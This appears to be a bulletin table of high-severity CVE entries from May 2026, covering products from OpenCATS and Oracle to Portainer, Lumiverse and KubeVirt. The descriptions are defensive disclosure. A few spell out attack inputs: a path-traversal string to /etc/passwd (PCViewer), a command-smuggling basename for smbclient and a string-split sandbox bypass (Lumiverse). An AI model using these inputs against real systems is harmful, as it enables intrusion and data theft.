| OpenCATS--OpenCATS | OpenCATS through 0.9.7.4 contains a sql injection vulnerability in the sortDirection parameter of the DataGrid component that allows authenticated users to extract database contents. Attackers can inject malicious SQL via the sortDirection parameter in ajax/getDataGridPager.php to perform time-based blind injection attacks and read sensitive data. | 2026-05-31 | 8.5 | CVE-2026-49489 |
| OpenCATS--OpenCATS | OpenCATS from version 0.9.1a contains an SQL injection vulnerability in DataGrid filter handling that allows authenticated attackers to inject SQL through crafted filters targeting the non-filterable Tags column in the Candidates DataGrid. Attackers can bypass column filterable restrictions by manipulating filter requests to execute arbitrary SQL queries against the database. | 2026-05-31 | 8.1 | CVE-2026-49490 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.4 contains an authorization bypass vulnerability in the bundled device-pair plugin that allows non-owner authorized chat senders to issue device-pairing bootstrap codes without proper scope validation. Attackers with chat command access can create setup codes to enroll devices with operator/node capabilities, granting persistent credentials until manual removal. | 2026-05-29 | 8.3 | CVE-2026-32905 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains an authorization bypass vulnerability in QQBot native approval buttons that fails to enforce configured approver identity. Non-approver users can click approval buttons to resolve pending exec or plugin approval requests without proper authorization. | 2026-05-29 | 8 | CVE-2026-35630 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.18 contains a scope bypass vulnerability in the Gateway chat.send route that allows scoped clients to execute privileged commands. Attackers with operator.write scope can deliver commands through inherited external routes to bypass operator.approvals and operator.admin scope requirements, enabling unauthorized plugin, config, MCP, allowlist, and ACP mutations. | 2026-05-29 | 8.8 | CVE-2026-35674 |
| OpenCTI-Platform--opencti | OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to 6.9.7, an organization admin can escalate their privileges by adding a user from a different organization with higher privileges, to their own organization. This is due to incorrect ACL on userEdit relationAdd. This vulnerability is fixed in 6.9.7. | 2026-05-26 | 7.2 | CVE-2026-44730 |
| Openises--Open ISES Project | The Open ISES Project 3.30A contains a path traversal vulnerability in the ajax/download.php endpoint that allows unauthenticated attackers to download arbitrary files by manipulating the filename parameter. Attackers can supply directory traversal sequences ../ in the filename parameter to access files outside the intended directory, including configuration files and system files. | 2026-05-30 | 7.5 | CVE-2018-25408 |
| Openkm--OpenKM Community Edition | OpenKM 6.3.12 contains an unrestricted SQL execution vulnerability that allows authenticated administrative users to execute arbitrary SQL statements against the application database via the DatabaseQuery interface. Attackers can submit malicious SQL queries through the qs parameter to the /admin/DatabaseQuery endpoint to extract sensitive data including usernames and password hashes from the OKM_USER table, modify permissions, or delete database records. | 2026-05-26 | 7.2 | CVE-2026-42425 |
| Openkm--OpenKM Community Edition | OpenKM 6.3.12 contains a remote code execution vulnerability that allows authenticated administrators to execute arbitrary Java/BeanShell code through the /admin/Scripting endpoint. Attackers can submit malicious script content with an action=Evaluate parameter to execute operating system commands in the context of the OpenKM application server. | 2026-05-26 | 7.2 | CVE-2026-42785 |
| openreplay--openreplay | OpenReplay is a self-hosted session replay suite. Prior to 1.26.0, OpenReplay's Python API exposes several app_apikey routes that trust a caller-provided projectKey after validating only that the API key itself is valid and that the target projectKey exists. The authorization flow does not verify that the authenticated API key and the requested project belong to the same tenant. Because the public tracker design exposes projectKey to browser-side code, an attacker who owns any valid API key for their own tenant can target another tenant's project by reusing that public projectKey. The vulnerable routes allow the attacker to enumerate victim user sessions and then retrieve sensitive session event data across the tenant boundary. This vulnerability is fixed in 1.26.0. | 2026-05-28 | 7.7 | CVE-2026-45296 |
| Oracle Corporation--Oracle Database Server | Vulnerability in the Net Service component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Net Service. While the vulnerability is in Net Service, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Net Service. CVSS 3.1 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 9 | CVE-2026-46833 |
| Oracle Corporation--Oracle Database Server | Vulnerability in the Net Service component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Net Service. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Net Service. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). | 2026-05-28 | 7.5 | CVE-2026-46834 |
| Oracle Corporation--Oracle Database Server | Vulnerability in the Net Service component of Oracle Database Server. Supported versions that are affected are 23.4.0-23.26.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Net Service. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Net Service. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). | 2026-05-28 | 7.5 | CVE-2026-46835 |
| Oracle Corporation--Oracle Financials Common Modules | Vulnerability in the Oracle Financials Common Modules product of Oracle E-Business Suite (component: Common Components). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financials Common Modules. While the vulnerability is in Oracle Financials Common Modules, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financials Common Modules accessible data as well as unauthorized update, insert or delete access to some of Oracle Financials Common Modules accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N). | 2026-05-28 | 8.5 | CVE-2026-46820 |
| Oracle Corporation--Oracle Financials Common Modules | Vulnerability in the Oracle Financials Common Modules product of Oracle E-Business Suite (component: Common Components). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financials Common Modules. While the vulnerability is in Oracle Financials Common Modules, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financials Common Modules accessible data. CVSS 3.1 Base Score 7.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N). | 2026-05-28 | 7.7 | CVE-2026-46821 |
| Oracle Corporation--Oracle Flow Manufacturing | Vulnerability in the Oracle Flow Manufacturing product of Oracle E-Business Suite (component: Security). Supported versions that are affected are 12.2.9-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via SQL to compromise Oracle Flow Manufacturing. Successful attacks of this vulnerability can result in takeover of Oracle Flow Manufacturing. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). | 2026-05-28 | 8.8 | CVE-2026-46837 |
| Oracle Corporation--Oracle Hospitality OPERA 5 Property Services | Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Opera). Supported versions that are affected are 5.6.19.24, 5.6.22, 5.6.25.19, 5.6.27.6 and 5.6.28. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality OPERA 5 Property Services. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). | 2026-05-28 | 9.8 | CVE-2026-34311 |
| Oracle Corporation--Oracle iAssets | Vulnerability in the Oracle iAssets product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle iAssets. While the vulnerability is in Oracle iAssets, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle iAssets. CVSS 3.1 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 9.9 | CVE-2026-46822 |
| Oracle Corporation--Oracle Internet Procurement Connector | Vulnerability in the Oracle Internet Procurement Connector product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Internet Procurement Connector. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Internet Procurement Connector accessible data as well as unauthorized access to critical data or complete access to all Oracle Internet Procurement Connector accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). | 2026-05-28 | 9.1 | CVE-2026-46819 |
| Oracle Corporation--Oracle Payments | Vulnerability in the Oracle Payments product of Oracle E-Business Suite (component: File Transmission). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Payments. Successful attacks of this vulnerability can result in takeover of Oracle Payments. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). | 2026-05-28 | 9.8 | CVE-2026-46817 |
| Oracle Corporation--Oracle Payments | Vulnerability in the Oracle Payments product of Oracle E-Business Suite (component: File Transmission). Supported versions that are affected are 12.2.3-12.2.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Payments. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Payments accessible data as well as unauthorized access to critical data or complete access to all Oracle Payments accessible data. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N). | 2026-05-28 | 7.4 | CVE-2026-46818 |
| Oracle Corporation--Oracle Payroll | Vulnerability in the Oracle Payroll product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle Payroll. Successful attacks of this vulnerability can result in takeover of Oracle Payroll. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). | 2026-05-28 | 8.8 | CVE-2026-46826 |
| Oracle Corporation--Oracle Payroll | Vulnerability in the Oracle Payroll product of Oracle E-Business Suite (component: Self Service Manager). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Payroll. Successful attacks of this vulnerability can result in takeover of Oracle Payroll. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). | 2026-05-28 | 8.8 | CVE-2026-46827 |
| Oracle Corporation--Oracle Payroll | Vulnerability in the Oracle Payroll product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Payroll. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Payroll accessible data as well as unauthorized access to critical data or complete access to all Oracle Payroll accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). | 2026-05-28 | 8.1 | CVE-2026-46828 |
| Oracle Corporation--Oracle Public Sector Financials (International) | Vulnerability in the Oracle Public Sector Financials (International) product of Oracle E-Business Suite (component: Authorization). Supported versions that are affected are 12.2.6-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle Public Sector Financials (International). While the vulnerability is in Oracle Public Sector Financials (International), attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Public Sector Financials (International) accessible data. CVSS 3.1 Base Score 7.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N). | 2026-05-28 | 7.7 | CVE-2026-46823 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Backend-as-a-Service). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. While the vulnerability is in Oracle REST Data Services, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle REST Data Services. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 10 | CVE-2026-46840 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle REST Data Services. While the vulnerability is in Oracle REST Data Services, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle REST Data Services. CVSS 3.1 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 9.9 | CVE-2026-46775 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle REST Data Services. While the vulnerability is in Oracle REST Data Services, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle REST Data Services. CVSS 3.1 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 9.9 | CVE-2026-46839 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle REST Data Services accessible data as well as unauthorized access to critical data or complete access to all Oracle REST Data Services accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). | 2026-05-28 | 8.1 | CVE-2026-35277 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle REST Data Services, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle REST Data Services accessible data as well as unauthorized access to critical data or complete access to all Oracle REST Data Services accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle REST Data Services. CVSS 3.1 Base Score 7.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L). | 2026-05-28 | 7.9 | CVE-2026-35266 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Mongoapi). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle REST Data Services. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). | 2026-05-28 | 7.5 | CVE-2026-46829 |
| Oracle Corporation--Oracle Universal Work Queue | Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Work Provider Site Level Administration). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Universal Work Queue. While the vulnerability is in Oracle Universal Work Queue, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle Universal Work Queue. CVSS 3.1 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). | 2026-05-28 | 9.9 | CVE-2026-46824 |
| Ourenergy--Collectric CMU | Collectric CMU 1.0 contains a boolean-based blind SQL injection vulnerability in the lang parameter that allows unauthenticated attackers to manipulate database queries during authentication. Attackers can inject SQL code through the lang parameter in login requests to extract sensitive information from the database using time-based blind techniques. | 2026-05-25 | 8.2 | CVE-2018-25379 |
| OUSL-GROUP-BrinaryBrains--School Student Management System | A weakness has been identified in OUSL-GROUP-BrinaryBrains School Student Management System up to 1e70e5ad1125b86dca4ee086eb6bb121f17708b6. This impacts the function sign_auth_cookie of the file application/controllers/Login.php of the component MY_Controller. Executing a manipulation of the argument role can lead to improper authentication. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 7.3 | CVE-2026-10167 |
| oviva-ag--epa4all-client | epa4all-client is the Java Client for epa4all / ePA 3.0 in the Telematik Infrastruktur. Prior to 1.2.1, in SignedPublicKeysTrustValidatorImpl.isTrusted(), the ECDSA signature verification at line 45 discards the boolean return value of Signature.verify(). The method performs certificate chain validation, OCSP check, and signature algorithm setup, but never checks whether the signature actually matches. For any structurally valid signature, it returns true. This vulnerability is fixed in 1.2.1. | 2026-05-26 | 8.1 | CVE-2026-44900 |
| oviva-ag--epa4all-client | epa4all-client is the Java Client for epa4all / ePA 3.0 in the Telematik Infrastruktur. Prior to 1.2.2, an attacker on the network path between the ePA service and the Konnektor can present any TLS certificate (self-signed, expired, wrong CN) and intercept all SOAP traffic. This includes patient identifiers (KVNR), SMC-B card operations (authentication, signing), document content, and credential exchanges. This vulnerability is fixed in 1.2.2. | 2026-05-26 | 8.1 | CVE-2026-45574 |
| oviva-ag--epa4all-client | epa4all-client is the Java Client for epa4all / ePA 3.0 in the Telematik Infrastruktur. Prior to 1.2.2, an attacker who can MITM the TLS connection between the client and the IDP (within the TI network) can substitute a forged discovery document. The forged document redirects uri_puk_idp_enc and uri_puk_idp_sig to attacker-controlled URLs. The client then encrypts the SMC-B-signed challenge response to the attacker's encryption key and POSTs it to the attacker's auth endpoint. This captures the signed authentication material. This vulnerability is fixed in 1.2.2. | 2026-05-26 | 7.4 | CVE-2026-45575 |
| pacote--pacote | Versions of the package pacote from 11.2.7 are vulnerable to Denial of Service (DoS) via the addGitSha function. An attacker can exploit this vulnerability by supplying a specially crafted spec.rawSpec value that triggers the function's regex replacement and string-manipulation logic, causing excessive CPU consumption and potentially stalling or crashing the process. | 2026-05-26 | 7.5 | CVE-2026-9496 |
| PCViewer--PCViewer | PCViewer vt1000 contains a directory traversal vulnerability that allows unauthenticated attackers to read arbitrary files by submitting relative path sequences in GET requests. Attackers can use path traversal sequences ../../../../../../../../../../../../etc/passwd to access sensitive system files outside the intended directory. | 2026-05-25 | 7.5 | CVE-2018-25365 |
| Pensar--Apex | @pensar/apex <= 0.0.58 is vulnerable to OS command injection via the smart_enumerate tool. The createSmartEnumerateTool() function in src/core/agent/tools.ts constructs a shell command by concatenating unsanitized values from the extensions array and url parameter into a string passed to Node.js child_process.exec(). Because exec() spawns a shell, shell metacharacters in those values are interpreted by the host shell, resulting in arbitrary OS command execution with the privileges of the running process. | 2026-05-27 | 8.8 | CVE-2026-36044 |
| phbernard--Favicon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in phbernard Favicon favicon-by-realfavicongenerator allows Reflected XSS.This issue affects Favicon: from n/a through <= 1.3.46. | 2026-05-27 | 7.1 | CVE-2026-42754 |
| Phoenix Contact--AXC F 1152 | The Web-based Management allows a remote low privileged Engineer user to install additional APPs on the device downloaded from the PLCnext Store without implementing any data verification mechanism, leading to the capability for an Engineer user to reach arbitrary code execution with root privileges on the PLC device. A successful exploitation may allow to install a manipulated APP package, potentially impacting integrity and availability of the PLCnext Control. | 2026-05-27 | 8.8 | CVE-2025-41669 |
| Phoenix Contact--AXC F 1152 | A local user with low privileges may be able to influence the behavior of a privileged system service by manipulating configuration or application-related files located in user-writable areas of the filesystem. The affected service processes data from locations that are not sufficiently protected against modification by low-privileged users. As the service runs with elevated privileges, successful exploitation may result in a local privilege escalation. | 2026-05-27 | 7.8 | CVE-2025-41670 |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, 2.39.2, and 2.41.0, Portainer offers an environment-level Disable bind mounts for non-administrators security setting that blocks regular users from binding host paths into containers they create through the Portainer-mediated Docker API. The check that enforces this setting only inspected the legacy HostConfig.Binds array on the container-create proxy and never looked at the equivalent HostConfig.Mounts array. Any authenticated user with rights to create containers on a Docker environment where the restriction is enabled could submit a bind-typed entry under HostConfig.Mounts and mount any host path into their container. This vulnerability is fixed in 2.33.8, 2.39.2, and 2.41.0. | 2026-05-28 | 8.5 | CVE-2026-44850 |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33., Portainer proxies requests to Kubernetes clusters through a middleware layer (kubeClientMiddleware) that validates the requesting user's token before forwarding traffic to the cluster. When security.RetrieveTokenData returned an error, the middleware wrote an HTTP 403 response but was missing a return statement - execution continued into the handler with a nil tokenData value. The Kubernetes endpoints sit behind Portainer's outer AuthenticatedAccess bouncer, so an attacker requires a valid Portainer session. However, a user whose secondary token validation fails in kubeClientMiddleware - for example a user without permission to access a given Kubernetes endpoint - would have their request forwarded to the cluster anyway, bypassing the authorization check. The same defect was present in both the CE and EE codebases. This vulnerability is fixed in 2.33.8. | 2026-05-28 | 8.1 | CVE-2026-44882 |
| prolix-oc--Lumiverse | Lumiverse is a full-featured AI chat application. Prior to 0.9.7, the Spindle extension build pipeline calls bun install without the --ignore-scripts flag before running the static backend safety scan (assertSafeBackendBundle). A malicious extension that ships a package.json with a preinstall, postinstall, or prepare lifecycle script achieves host-level code execution the moment an admin presses Install before any dist file is inspected. This vulnerability is fixed in 0.9.7. | 2026-05-26 | 9.1 | CVE-2026-44444 |
| prolix-oc--Lumiverse | Lumiverse is a full-featured AI chat application. Prior to 0.9.7, when the primary toSmbPath(fullPath) call throws, the method falls back to a dirname/basename split and only validates the directory prefix. The basename is concatenated directly into the smbclient -c script without validation. smbclient interprets ; as a subcommand separator and !cmd as a local-shell escape that runs cmd on the host. A path whose directory component is clean but whose basename contains "; !<cmd>; echo " achieves arbitrary command execution on the Lumiverse server. This vulnerability is fixed in 0.9.7. | 2026-05-26 | 9.1 | CVE-2026-44449 |
| prolix-oc--Lumiverse | Lumiverse is a full-featured AI chat application. Prior to 0.9.7, the MCP server creation endpoint validates the command field against an allowlist of binary names but forwards the args array to the child process without any validation. Every binary on the allowlist accepts an inline-code execution flag (-e for node/bun, -c for python3/deno), giving any logged-in user arbitrary OS-level code execution on the Lumiverse server. The route requires only requireAuth (not requireOwner). The server binds on all interfaces (::) and the host-header rebinding check is bypassed trivially by any HTTP client that sends Host: localhost:<port> directly, making this exploitable from any machine with network access to the server port. This vulnerability is fixed in 0.9.7. | 2026-05-26 | 9.9 | CVE-2026-44450 |
| prolix-oc--Lumiverse | Lumiverse is a full-featured AI chat application. Prior to 0.9.7, the component override system transpiles user-supplied TSX via Sucrase and evaluates it with new Function, shadowing dangerous globals (fetch, window, eval, etc.) with undefined. A static source validator (validateComponentOverrideSource) additionally blocks these identifiers by word-boundary regex. Both controls are bypassed. String-split bypass of the static validator: any blocked identifier can be reconstructed at runtime from string fragments ('ownerDoc' + 'ument'). DOM ref escape from the sandbox: useRef and useEffect are provided in scope. A ref attached to a rendered element gives a live DOM node. From any real DOM node, node['ownerDoc'+'ument']['def'+'aultView'] yields the real window, bypassing all identifier shadows. Theme packs (.lumitheme / .lumiverse-theme) are the shareable delivery mechanism. A malicious pack is an exploit path: the victim imports the file, enables one component override in the Theme Editor, and the payload fires in their authenticated session.This vulnerability is fixed in 0.9.7. | 2026-05-26 | 9.3 | CVE-2026-44451 |
| Property Hive--PropertyHive | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Property Hive PropertyHive propertyhive allows DOM-Based XSS.This issue affects PropertyHive: from n/a through <= 2.2.2. | 2026-05-27 | 7.1 | CVE-2026-42729 |
| pyload--pyload | pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the packages.js template at src/pyload/webui/app/themes/modern/templates/js/packages.js:172 interpolates a stored link URL into a template literal inside single-quoted HTML and then writes the result to the DOM via $(div).html(html). No escaping runs between the API value and innerHTML. An attacker (Alice) who can submit a package link puts a single quote plus event handler into the URL, breaks out of the attribute, and executes JavaScript in every operator's browser that opens the downloads view. The theme does not set a Content Security Policy that restricts inline script or event handlers. This vulnerability is fixed in 0.5.0b3.dev100. | 2026-05-28 | 8.7 | CVE-2026-45348 |
| rancher--local-path-provisioner | Local Path Provisioner provides a way for the Kubernetes users to utilize the local storage in each node. Prior to 0.0.36, a malicious user with permission to edit the local-path-config ConfigMap in the local-path-storage namespace can manipulate the helperPod.yaml template used by rancher/local-path-provisioner. The helperPod.yaml template is loaded by the provisioner and used to create HelperPods during PVC provisioning and cleanup operations. However, the template is not sufficiently validated before use. Security-sensitive fields such as securityContext.privileged, hostPath volumes, and Linux capabilities can be injected into the template. When a PVC operation triggers HelperPod creation, the provisioner creates the HelperPod using the attacker-controlled template. This can result in a privileged pod running on the target node with the host root filesystem mounted. This may allow the attacker to access sensitive host files, read ServiceAccount tokens from other pods on the same node, access other tenants' local-path volume data, or modify files on the host node. This vulnerability is fixed in 0.0.36. | 2026-05-28 | 8.7 | CVE-2026-44543 |
| ranfdev--deepobj | deepobj provides get, set, delete deep objects in javascript. Prior to 1.0.3, prototype pollution is possible when property paths contain __proto__/constructor/prototype. The property path must not be exposed as user input. This vulnerability is fixed in 1.0.3. | 2026-05-28 | 8.2 | CVE-2026-46509 |
| RealMag777--Active Products Tables for WooCommerce | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 Active Products Tables for WooCommerce profit-products-tables-for-woocommerce allows Blind SQL Injection.This issue affects Active Products Tables for WooCommerce: from n/a through <= 1.0.8. | 2026-05-27 | 9.3 | CVE-2026-42727 |
| RealMag777--Active Products Tables for WooCommerce | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 Active Products Tables for WooCommerce profit-products-tables-for-woocommerce allows Blind SQL Injection.This issue affects Active Products Tables for WooCommerce: from n/a through <= 1.0.9. | 2026-05-27 | 9.3 | CVE-2026-42761 |
| RealMag777--TableOn | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RealMag777 TableOn posts-table-filterable allows Blind SQL Injection.This issue affects TableOn: from n/a through <= 1.0.5.1. | 2026-05-27 | 9.3 | CVE-2026-42755 |
| RealMag777--WPCS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 WPCS currency-switcher allows DOM-Based XSS.This issue affects WPCS: from n/a through <= 1.3.1. | 2026-05-27 | 7.1 | CVE-2026-42733 |
| Red Hat--Pen Drive Powered by Red Hat Lightspeed | A command injection vulnerability was discovered in the `rpmuncompress` utility of RPM. When extracting certain archive formats (ZIP, 7z, GEM) to a specified destination directory, the tool inserts the archive's top-level folder name into a shell command without properly sanitizing it. A specially crafted archive containing shell metacharacters in its folder name can execute arbitrary commands as the user running the extraction. | 2026-05-28 | 7 | CVE-2026-44604 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak's Fine-Grained Admin Permissions (FGAPv2) feature. An administrator with limited client management permissions can exploit this vulnerability to assign any realm role, including highly privileged roles, to a client's scope mapping. This bypasses intended security controls, allowing the injected role to be projected into a user's authentication token when they access the modified client. This could lead to unauthorized privilege escalation within the Keycloak realm. | 2026-05-28 | 7.3 | CVE-2026-9795 |
| Red Hat--Red Hat Container Native Virtualization 4.12 | A flaw was found in KubeVirt's virt-handler component. This vulnerability allows an authenticated OpenShift user with edit permissions in a single namespace to exploit improper symlink validation when connecting to virtual machine console sockets. By replacing the console socket with a symlink to the host's container runtime (CRI-O) socket, an attacker can hijack virt-handler's privileged connection. This enables the attacker to access any Unix socket on the host, potentially leading to full control of the node and the entire cluster. | 2026-05-26 | 9.9 | CVE-2026-7374 |
